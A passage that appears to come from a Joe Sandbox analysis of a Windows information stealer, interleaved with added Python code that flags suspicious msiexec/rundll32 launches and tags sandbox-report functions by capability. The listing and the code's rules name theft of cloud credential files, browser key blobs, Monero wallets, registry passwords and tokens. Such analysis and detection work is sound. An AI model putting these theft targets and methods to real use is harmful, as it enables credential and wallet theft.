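    "c:\\program files\\", "c:\\program files (x86)\\",
)

# Constructed process-creation records (not taken from the sandbox run).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\msiexec.exe", "parent_image": r"C:\Users\bob\Desktop\file.exe",
     "command_line": r'C:\Windows\system32\msiexec.exe /i "C:\Users\bob\AppData\Local\Temp\pkg.msi" /passive'},
    {"image": r"C:\Windows\System32\msiexec.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'msiexec.exe /i "C:\Windows\Installer\1a2b3c.msi" /passive'},
    {"image": r"C:\Windows\System32\rundll32.exe", "parent_image": r"C:\Users\bob\Desktop\file.exe",
     "command_line": r'C:\Windows\system32\rundll32.exe "C:\Users\bob\AppData\Local\Temp\mod.dll"'},
    {"image": r"C:\Windows\System32\rundll32.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"C:\Windows\system32\rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"image": r"C:\Windows\System32\msiexec.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'msiexec.exe /i "C:\Users\bob\Downloads\setup.msi" /qn'},
]

def split_cmdline(cmd: str) -> list:
    """Windows-style split: a double-quoted run is one argument, quotes removed."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in re.finditer(r'"([^"]*)"|(\S+)', cmd)]

def in_trusted_root(path: str) -> bool:
    return path.lower().startswith(TRUSTED_ROOTS)

def classify(rec: dict) -> Optional[str]:
    """Verdict for one record, or None when it does not match either form."""
    image = rec["image"].lower()
    argv = split_cmdline(rec["command_line"])[1:]        # drop the image token itself
    low = [a.lower() for a in argv]
    if image.endswith("\\msiexec.exe") and "/i" in low and "/passive" in low:
        i = low.index("/i") + 1                           # package path follows /i
        if i < len(argv) and low[i].endswith(".msi") and not in_trusted_root(argv[i]):
            return "msiexec /passive install from untrusted path"
    if image.endswith("\\rundll32.exe") and argv:
        dll = argv[0].split(",")[0]                       # rundll32 <dll>[,<entry>]
        if dll.lower().endswith(".dll") and not in_trusted_root(dll):
            return "rundll32 loading DLL from untrusted path"
    return None

def scan(records: list) -> list:
    """(record index, parent image, verdict) for every record that matches."""
    return [(n, rec.get("parent_image", ""), classify(rec))
            for n, rec in enumerate(records) if classify(rec)]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

Both rules hinge on the package or DLL sitting outside the trusted roots, so a legitimate `msiexec /i "...\Downloads\setup.msi" /passive` will match as well; treat the verdict as a hunting lead to join with the parent process (here the sample itself) rather than a standalone alert. The `/qn` record is left unflagged on purpose: the rule mirrors exactly the `/passive` form this function builds, and widening it is a tuning decision.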
                              APIs
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                                • Part of subcall function 004B6280: InternetOpenA.WININET(004D0DFE,00000001,00000000,00000000,00000000), ref: 004B62E1
                                • Part of subcall function 004B6280: StrCmpCA.SHLWAPI(?,0118E2D0), ref: 004B6303
                                • Part of subcall function 004B6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004B6335
                                • Part of subcall function 004B6280: HttpOpenRequestA.WININET(00000000,GET,?,0118DA58,00000000,00000000,00400100,00000000), ref: 004B6385
                                • Part of subcall function 004B6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004B63BF
                                • Part of subcall function 004B6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004B63D1
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004C5318
                              • lstrlen.KERNEL32(00000000), ref: 004C532F
                                • Part of subcall function 004C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004C8E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 004C5364
                              • lstrlen.KERNEL32(00000000), ref: 004C5383
                              • lstrlen.KERNEL32(00000000), ref: 004C53AE
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: b76c7a915d84224ba0dea81f90244e71e202204dd7846435ef3dcf970928798e
                              • Instruction ID: f6ae6f01a46bb9f2bc118d59b348885a4c6790713c694d317418d6b1bd8304ad
                              • Opcode Fuzzy Hash: b76c7a915d84224ba0dea81f90244e71e202204dd7846435ef3dcf970928798e
                              • Instruction Fuzzy Hash: 6F512D7891010CABCB54FF61C996FED7779AF10308F50401EE80A5A592DF386B56CB7A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 8fbbdc85234eaaacc4baccbf640e3998310204df27edf8c7fe6556f2f5fa6359
                              • Instruction ID: bf164e143e3f429c68c9a8da9c0106874490f0629d66d0c50d8737bcf8544682
                              • Opcode Fuzzy Hash: 8fbbdc85234eaaacc4baccbf640e3998310204df27edf8c7fe6556f2f5fa6359
                              • Instruction Fuzzy Hash: 7BC1B5B990020D9BCB54EF60DC89FEA7379BB54308F00459EF10AA7251DA74EA85CFA5
                              APIs
                                • Part of subcall function 004C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004C8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 004C42EC
                              • lstrcat.KERNEL32(?,0118DF98), ref: 004C430B
                              • lstrcat.KERNEL32(?,?), ref: 004C431F
                              • lstrcat.KERNEL32(?,0118C7B0), ref: 004C4333
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004C8D90: GetFileAttributesA.KERNEL32(00000000,?,004B1B54,?,?,004D564C,?,?,004D0E1F), ref: 004C8D9F
                                • Part of subcall function 004B9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 004B9D39
                                • Part of subcall function 004B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004B99EC
                                • Part of subcall function 004B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004B9A11
                                • Part of subcall function 004B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 004B9A31
                                • Part of subcall function 004B99C0: ReadFile.KERNEL32(000000FF,?,00000000,004B148F,00000000), ref: 004B9A5A
                                • Part of subcall function 004B99C0: LocalFree.KERNEL32(004B148F), ref: 004B9A90
                                • Part of subcall function 004B99C0: CloseHandle.KERNEL32(000000FF), ref: 004B9A9A
                                • Part of subcall function 004C93C0: GlobalAlloc.KERNEL32(00000000,004C43DD,004C43DD), ref: 004C93D3
                              • StrStrA.SHLWAPI(?,0118DF08), ref: 004C43F3
                              • GlobalFree.KERNEL32(?), ref: 004C4512
                                • Part of subcall function 004B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NK,00000000,00000000), ref: 004B9AEF
                                • Part of subcall function 004B9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,004B4EEE,00000000,?), ref: 004B9B01
                                • Part of subcall function 004B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NK,00000000,00000000), ref: 004B9B2A
                                • Part of subcall function 004B9AC0: LocalFree.KERNEL32(?,?,?,?,004B4EEE,00000000,?), ref: 004B9B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 004C44A3
                              • StrCmpCA.SHLWAPI(?,004D08D1), ref: 004C44C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 004C44D2
                              • lstrcat.KERNEL32(00000000,?), ref: 004C44E5
                              • lstrcat.KERNEL32(00000000,004D0FB8), ref: 004C44F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: 8adff53ac4f1f7018983eeeb273f972567e1ab91350fd6c3da66d09c45bbcd62
                              • Instruction ID: 53d94102fc41c5698d396b72f6fa7d0929ef71db291e606a89053a3f1d623994
                              • Opcode Fuzzy Hash: 8adff53ac4f1f7018983eeeb273f972567e1ab91350fd6c3da66d09c45bbcd62
                              • Instruction Fuzzy Hash: C27194B6900208BBCB54EBE0DC95FEE7379AB88304F00459DF60997181EA78DB55CFA5
                              APIs
                                • Part of subcall function 004B12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004B12B4
                                • Part of subcall function 004B12A0: RtlAllocateHeap.NTDLL(00000000), ref: 004B12BB
                                • Part of subcall function 004B12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004B12D7
                                • Part of subcall function 004B12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 004B12F5
                                • Part of subcall function 004B12A0: RegCloseKey.ADVAPI32(?), ref: 004B12FF
                              • lstrcat.KERNEL32(?,00000000), ref: 004B134F
                              • lstrlen.KERNEL32(?), ref: 004B135C
                              • lstrcat.KERNEL32(?,.keys), ref: 004B1377
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                                • Part of subcall function 004C8B60: GetSystemTime.KERNEL32(004D0E1A,0118CF88,004D05AE,?,?,004B13F9,?,0000001A,004D0E1A,00000000,?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004C8B86
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 004B1465
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                                • Part of subcall function 004B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004B99EC
                                • Part of subcall function 004B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004B9A11
                                • Part of subcall function 004B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 004B9A31
                                • Part of subcall function 004B99C0: ReadFile.KERNEL32(000000FF,?,00000000,004B148F,00000000), ref: 004B9A5A
                                • Part of subcall function 004B99C0: LocalFree.KERNEL32(004B148F), ref: 004B9A90
                                • Part of subcall function 004B99C0: CloseHandle.KERNEL32(000000FF), ref: 004B9A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 004B14EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: 3f19a4ab73034de17e1db9ca62bc9cc6002c66dc2c4c97f36725ec6eac4a00e6
                              • Instruction ID: 1e5103ef90395cdb68b36111575ae44f012af89d3d819b43c2b420655df14db2
                              • Opcode Fuzzy Hash: 3f19a4ab73034de17e1db9ca62bc9cc6002c66dc2c4c97f36725ec6eac4a00e6
                              • Instruction Fuzzy Hash: 095152B5D1011857CB55FB61DC92FED733CAB50308F4045AEB20A62091EE386B99CAAA
                              APIs
                                • Part of subcall function 004B72D0: memset.MSVCRT ref: 004B7314
                                • Part of subcall function 004B72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004B733A
                                • Part of subcall function 004B72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004B73B1
                                • Part of subcall function 004B72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 004B740D
                                • Part of subcall function 004B72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 004B7452
                                • Part of subcall function 004B72D0: HeapFree.KERNEL32(00000000), ref: 004B7459
                              • lstrcat.KERNEL32(00000000,004D17FC), ref: 004B7606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 004B7648
                              • lstrcat.KERNEL32(00000000, : ), ref: 004B765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 004B768F
                              • lstrcat.KERNEL32(00000000,004D1804), ref: 004B76A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 004B76D3
                              • lstrcat.KERNEL32(00000000,004D1808), ref: 004B76ED
                              • task.LIBCPMTD ref: 004B76FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                              • String ID: :
                              • API String ID: 3191641157-3653984579
                              • Opcode ID: f5b19e8b4922bd11d7bf78324c6945dfe499c4330f3d34658073985d552c27be
                              • Instruction ID: 85b541111b5956221a48c51e85652a242759ac3798d0f58714248abfa2f9faf1
                              • Opcode Fuzzy Hash: f5b19e8b4922bd11d7bf78324c6945dfe499c4330f3d34658073985d552c27be
                              • Instruction Fuzzy Hash: 09315EB1A00109EFCB04EBE5DC95DFE7379BB44305B14511EF116A7390DA38A946CB66
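Every function entry in this listing has the same shape: an `APIs` list of `Name.MODULE(args), ref: address` lines (indented `Part of subcall function` lines for callees), a `String ID` whose referenced strings are joined with `$`, and an `Instruction Fuzzy Hash` that closes the entry. Read together, the entries above spell out the stealer's capabilities: the `*.*` search under `.aws`, `.azure` and `.IdentityService\msal.cache`; the `"encrypted_key":"` lookup followed by `CryptStringToBinaryA` with flag `00000001` (`CRYPT_STRING_BASE64`); the `SOFTWARE\monero-project\monero-core` `wallet_path` read and `.keys` copy; the WinINet request whose reply is compared against `ERROR`; and the `RegEnumValueA` walk of a `HKEY_CURRENT_USER` (`80000001`) key looking for values named `Password`. The parser below is an added example for this report, not Joe Sandbox code; its input is constructed from lines of this page, and the capability labels are the example's own heuristics rather than anything the report asserts.

```python
"""Parse the per-function listing of a Joe Sandbox report (its repeating APIs /
String ID / Instruction Fuzzy Hash entries) and tag each function with the capability
its API calls and string references point to. Added example for this report page, not
Joe Sandbox code; the capability rules are heuristics built from the listing's own text."""
import re
from dataclasses import dataclass, field
from typing import Optional

@dataclass
class ApiCall:
    name: str
    args: tuple
    ref: str
    subcall_of: Optional[str]  # callee address on "Part of subcall" lines, None for a direct call

@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)

# Constructed input: six entries in the report's format, abridged (API ID, Opcode ID and
# dump lines dropped; the parser skips anything that is not an API or String ID line).
SAMPLE = r"""
• String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
• Instruction Fuzzy Hash: 3441A5BAA4020867CB50F770DC57FED3338AB64704F40445EB549A61C1EDB85BC9CBA6
APIs
• ShellExecuteEx.SHELL32(0000003C), ref: 004C31C5
• ShellExecuteEx.SHELL32(0000003C), ref: 004C335D
• String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
• Instruction Fuzzy Hash: DB12207980010C9BDB54FBA1DC92FEDB738AF14308F50416EE10666191EF782B5ACF6A
APIs
  • Part of subcall function 004B6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004B63D1
• StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004C5318
• String ID: ERROR$ERROR$ERROR$ERROR$ERROR
• Instruction Fuzzy Hash: 6F512D7891010CABCB54FF61C996FED7779AF10308F50401EE80A5A592DF386B56CB7A
APIs
  • Part of subcall function 004B9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 004B9D39
  • Part of subcall function 004B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NK,00000000,00000000), ref: 004B9AEF
• String ID:
• Instruction Fuzzy Hash: C27194B6900208BBCB54EBE0DC95FEE7379AB88304F00459DF60997181EA78DB55CFA5
APIs
  • Part of subcall function 004B12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004B12D7
• CopyFileA.KERNEL32(?,00000000,00000001), ref: 004B1465
• String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
• Instruction Fuzzy Hash: 095152B5D1011857CB55FB61DC92FED733CAB50308F4045AEB20A62091EE386B99CAAA
APIs
  • Part of subcall function 004B72D0: memset.MSVCRT ref: 004B7314
  • Part of subcall function 004B72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004B73B1
  • Part of subcall function 004B72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 004B740D
• String ID: :
• Instruction Fuzzy Hash: 09315EB1A00109EFCB04EBE5DC95DFE7379BB44305B14511EF116A7390DA38A946CB66
"""

API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.[A-Z0-9]+(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
STRING_ID, END_MARK = "• String ID:", "• Instruction Fuzzy Hash:"

def parse_report(text: str) -> list:
    entries, cur = [], FunctionEntry()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
            cur.calls.append(ApiCall(m["name"], args, m["ref"], m["sub"]))
        elif line.startswith(STRING_ID):            # '$' separates the referenced strings
            rest = line[len(STRING_ID):]
            cur.strings = [t for t in (rest[1:] if rest.startswith(" ") else rest).split("$") if t]
        elif line.startswith(END_MARK):             # last field of every entry
            entries.append(cur)
            cur = FunctionEntry()
    if cur.calls or cur.strings:                    # tolerate a truncated final entry
        entries.append(cur)
    return entries

def capabilities(entry: FunctionEntry) -> set:
    names = {c.name for c in entry.calls}
    args = {a for c in entry.calls for a in c.args}
    def any_str(pattern):
        return any(re.search(pattern, s, re.I) for s in entry.strings)
    caps = set()
    if any_str(r"\.aws|\.azure|msal\.cache|IdentityService"):
        caps.add("cloud-credential-files")
    if any_str(r"wallet\.keys|monero"):
        caps.add("crypto-wallet")
    if any("encrypted_key" in a for a in args):     # Chromium Local State key field
        caps.add("browser-key-blob")
    if "ShellExecuteEx" in names and any_str(r"msiexec\.exe|rundll32\.exe"):
        caps.add("payload-execution")
    if any(n.startswith(("Internet", "Http")) for n in names):
        caps.add("http-c2")
    if "RegEnumValueA" in names and "Password" in args:
        caps.add("registry-credential-scan")
    return caps

if __name__ == "__main__":
    for e in parse_report(SAMPLE):
        print(sorted(capabilities(e)), [c.name for c in e.calls if c.subcall_of is None])
```

Pointing the parser at a full report export gives one entry per function with the calls split into direct and subcall groups, which is the quickest way to locate the handful of functions worth opening in the memory dump; the `String ID` tokens are kept verbatim (leading spaces included, as in ` /passive`) because the stealer concatenates them literally.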
                              APIs
                              • memset.MSVCRT ref: 004B7314
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 004B733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004B73B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 004B740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 004B7452
                              • HeapFree.KERNEL32(00000000), ref: 004B7459
                              • task.LIBCPMTD ref: 004B7555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuememsettask
                              • String ID: Password
                              • API String ID: 2808661185-3434357891
                              • Opcode ID: a9aded0a3d36ab212c962fc671f22d3ca0f057dd4a107deae2da50684041a826
                              • Instruction ID: 4e967f3e23fd3e4105d90cd003c5337d6b45c5a52915b80a952ae7745dac4878
                              • Opcode Fuzzy Hash: a9aded0a3d36ab212c962fc671f22d3ca0f057dd4a107deae2da50684041a826
                              • Instruction Fuzzy Hash: 87613BB58001289BDB24DB50CC41BEAB7BCBF44344F0081EAE649A6241DBB46FC9CFA5
                              APIs
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                                • Part of subcall function 004B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004B4839
                                • Part of subcall function 004B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 004B4849
                              • InternetOpenA.WININET(004D0DF7,00000001,00000000,00000000,00000000), ref: 004B610F
                              • StrCmpCA.SHLWAPI(?,0118E2D0), ref: 004B6147
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004B618F
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004B61B3
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 004B61DC
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 004B620A
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 004B6249
                              • InternetCloseHandle.WININET(?), ref: 004B6253
                              • InternetCloseHandle.WININET(00000000), ref: 004B6260
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 2507841554-0
                              • Opcode ID: a218017d88eec61754ccc6661665c98ed503cd1f34b24259aaf3c2a7aac2c940
                              • Instruction ID: a88b5a8fc87f9783171c583a81236e5b7be6b178e47a1da4be469d91ab02ea5a
                              • Opcode Fuzzy Hash: a218017d88eec61754ccc6661665c98ed503cd1f34b24259aaf3c2a7aac2c940
                              • Instruction Fuzzy Hash: E15184B5900208ABDF24EF91DC45FEE77B9FB44705F104099B609A71C0DB786A85CFAA
                              APIs
                                • Part of subcall function 004CA740: lstrcpy.KERNEL32(004D0E17,00000000), ref: 004CA788
                                • Part of subcall function 004CA9B0: lstrlen.KERNEL32(?,011887E8,?,\Monero\wallet.keys,004D0E17), ref: 004CA9C5
                                • Part of subcall function 004CA9B0: lstrcpy.KERNEL32(00000000), ref: 004CAA04
                                • Part of subcall function 004CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 004CAA12
                                • Part of subcall function 004CA920: lstrcpy.KERNEL32(00000000,?), ref: 004CA972
                                • Part of subcall function 004CA920: lstrcat.KERNEL32(00000000), ref: 004CA982
                                • Part of subcall function 004CA8A0: lstrcpy.KERNEL32(?,004D0E17), ref: 004CA905
                                • Part of subcall function 004CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 004CA7E6
                              • lstrlen.KERNEL32(00000000), ref: 004BBC9F
                                • Part of subcall function 004C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004C8E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 004BBCCD
                              • lstrlen.KERNEL32(00000000), ref: 004BBDA5
                              • lstrlen.KERNEL32(00000000), ref: 004BBDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                              • Associated: 00000000.00000002.1411595547.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.000000000056D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.0000000000592000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411617744.00000000006FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000089D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009A9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1411857452.00000000009B7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1412326759.00000000009B8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1413122738.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 3073930149-1079375795
                              • Opcode ID: ae493ebf0589e958bf730122ee43530718a735161c142abf131e3228dbc0c098
                              • Instruction ID: 08ab90bb54cd4520e274e2423f2a2ea0b67570d7a26666c713d9d3d700c1c241
